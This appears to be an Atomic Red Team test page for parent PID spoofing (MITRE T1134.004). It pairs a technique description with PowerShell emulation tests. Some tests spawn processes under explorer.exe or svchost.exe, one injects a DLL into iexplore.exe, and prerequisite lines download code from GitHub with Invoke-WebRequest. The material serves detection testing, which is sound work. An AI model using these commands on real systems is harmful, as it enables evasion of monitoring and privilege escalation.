Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via theCreateProcess
API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically viasvchost.exe
orconsent.exe
) rather than the current user context.(Citation: Microsoft UAC Nov 2018) Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to beexplorer.exe
rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018) Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such aslsass.exe
), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
Atomic Test #2 - Parent PID Spoofing - Spawn from Current Process
Atomic Test #3 - Parent PID Spoofing - Spawn from Specified Process
Atomic Test #4 - Parent PID Spoofing - Spawn from svchost.exe
Atomic Test #5 - Parent PID Spoofing - Spawn from New Process
This test uses PowerShell to replicates how Cobalt Strike does ppid spoofing and masquerade a spawned process. Upon execution, “Process C:\Program Files\Internet Explorer\iexplore.exe is spawned with pid ####” will be displayed and calc.exe will be launched.
Credit to In Ming Loh (https://github.com/countercept/ppid-spoofing/blob/master/PPID-Spoof.ps1)
Supported Platforms: Windows
auto_generated_guid: 069258f4-2162-46e9-9a25-c9c6c56150d2
| Name | Description | Type | Default Value | |——|————-|——|—————| | parent_process_name | Name of the parent process | string | explorer| | spawnto_process_path | Path of the process to spawn | path | C:\Program Files\Internet Explorer\iexplore.exe| | dll_process_name | Name of the created process from the injected dll | string | calculator| | dll_path | Path of the dll to inject | path | PathToAtomicsFolder\T1134.004\bin\calc.dll| | spawnto_process_name | Name of the process to spawn | string | iexplore|
1
powershell
!1
2
3
. "$PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1"
$ppid=Get-Process #{parent_process_name} | select -expand id
PPID-Spoof -ppid $ppid -spawnto "#{spawnto_process_path}" -dllpath "#{dll_path}"
1
2
Stop-Process -Name "#{dll_process_name}" -ErrorAction Ignore
Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore
1
powershell
!1
if (Test-Path "#{dll_path}") {exit 0} else {exit 1}
1
2
New-Item -Type Directory (split-path "#{dll_path}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}"
1
if (Test-Path "$PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1") {exit 0} else {exit 1}
1
2
New-Item -Type Directory (split-path "$PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1134.004/src/PPID-Spoof.ps1" -OutFile "$PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1"
Spawns a powershell.exe process as a child of the current process.
Supported Platforms: Windows
auto_generated_guid: 14920ebd-1d61-491a-85e0-fe98efe37f25
| Name | Description | Type | Default Value | |——|————-|——|—————| | file_path | File path or name of process to spawn | path | $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe| | parent_pid | PID of process to spawn from | string | $PID| | command_line | Specified command line to use | string | -Command Start-Sleep 10|
1
powershell
!1
Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}' -ParentId #{parent_pid}
1
powershell
!1
2
3
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
1
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
Spawns a notepad.exe process as a child of the current process.
Supported Platforms: Windows
auto_generated_guid: cbbff285-9051-444a-9d17-c07cd2d230eb
| Name | Description | Type | Default Value | |——|————-|——|—————| | parent_pid | PID of process to spawn from | string | $PID| | test_guid | Defined test GUID | string | 12345678-1234-1234-1234-123456789123|
1
powershell
!1
Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid #{test_guid}
1
powershell
!1
2
3
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
1
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
Spawnd a process as a child of the first accessible svchost.exe process.
Supported Platforms: Windows
auto_generated_guid: e9f2b777-3123-430b-805d-5cedc66ab591
| Name | Description | Type | Default Value | |——|————-|——|—————| | command_line | Specified command line to use | string | -Command Start-Sleep 10| | file_path | File path or name of process to spawn | path | $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe|
1
powershell
!1
Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, ProcessId -Filter "Name = 'svchost.exe' AND CommandLine LIKE '%'" | Select-Object -First 1 | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}'
1
powershell
!1
2
3
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
1
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
Creates a notepad.exe process and then spawns a powershell.exe process as a child of it.
Supported Platforms: Windows
auto_generated_guid: 2988133e-561c-4e42-a15f-6281e6a9b2db
| Name | Description | Type | Default Value | |——|————-|——|—————| | command_line | Specified command line to use | string | -Command Start-Sleep 10| | file_path | File path or name of process to spawn | path | $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe| | parent_name | Parent process to spoof from | path | $Env:windir\System32\notepad.exe|
1
powershell
!1
Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}'
1
powershell
!1
2
3
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
1
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force